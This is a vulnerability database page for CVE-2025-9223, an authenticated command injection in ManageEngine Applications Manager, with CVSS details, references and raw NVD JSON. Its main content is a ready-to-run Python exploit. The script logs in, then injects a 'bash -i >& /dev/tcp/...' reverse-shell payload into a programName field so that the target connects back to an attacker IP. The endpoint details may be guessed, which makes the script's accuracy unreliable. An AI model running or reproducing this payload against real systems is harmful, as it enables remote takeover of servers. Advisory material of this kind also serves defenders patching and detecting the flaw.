CVE-2025-9223

Description

Zohocorp ManageEngine Applications Manager versions 178100 and below are vulnerable to authenticated command injection vulnerability due to the improper configuration in the execute program action feature.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

ManageEngine Applications Manager <= 178100

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-9223 PoC - ManageEngine Applications Manager Command Injection
Authenticated command injection via execute program action feature
"""
import requests
import json
import sys

target = "http://target:8080"
username = "low_priv_user"
password = "password123"
attacker_ip = "10.0.0.1"
attacker_port = "4444"

session = requests.Session()

def login():
    """Authenticate to Applications Manager"""
    login_url = f"{target}/j_security_check"
    data = {
        'j_username': username,
        'j_password': password
    }
    response = session.post(login_url, data=data, verify=False)
    return 'Login successful' in response.text or response.status_code == 200

def exploit():
    """Execute command via execute program action"""
    # Construct malicious payload for command injection
    payload = f";bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1;"
    
    exploit_url = f"{target}/executeProgram"
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-Requested-With': 'XMLHttpRequest'
    }
    
    data = {
        'programName': f'/bin/bash{payload}',
        'arguments': '',
        'action': 'execute'
    }
    
    response = session.post(exploit_url, data=data, headers=headers, verify=False)
    return response.status_code == 200

if __name__ == "__main__":
    print(f"[*] Targeting {target}")
    print("[*] Attempting authentication...")
    
    if login():
        print("[+] Authentication successful!")
        print("[*] Sending exploit payload...")
        if exploit():
            print("[+] Exploit sent! Check your listener for reverse shell.")
        else:
            print("[-] Exploit failed.")
    else:
        print("[-] Authentication failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-9223
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-9223
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-9223/
[4] VulDB https://vuldb.com/cve/CVE-2025-9223
[5] https://www.manageengine.com/products/applications_manager/security-updates/security-updates-cve-2025-9223.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-9223", "sourceIdentifier": "0fc0942c-577d-436f-ae8e-945763c79b02", "published": "2025-11-11T14:15:35.507", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zohocorp ManageEngine Applications Manager versions 178100 and below are vulnerable to authenticated command injection vulnerability due to the improper configuration in the execute program action feature."}], "metrics": {"cvssMetricV31": [{"source": "0fc0942c-577d-436f-ae8e-945763c79b02", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "0fc0942c-577d-436f-ae8e-945763c79b02", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://www.manageengine.com/products/applications_manager/security-updates/security-updates-cve-2025-9223.html", "source": "0fc0942c-577d-436f-ae8e-945763c79b02"}]}}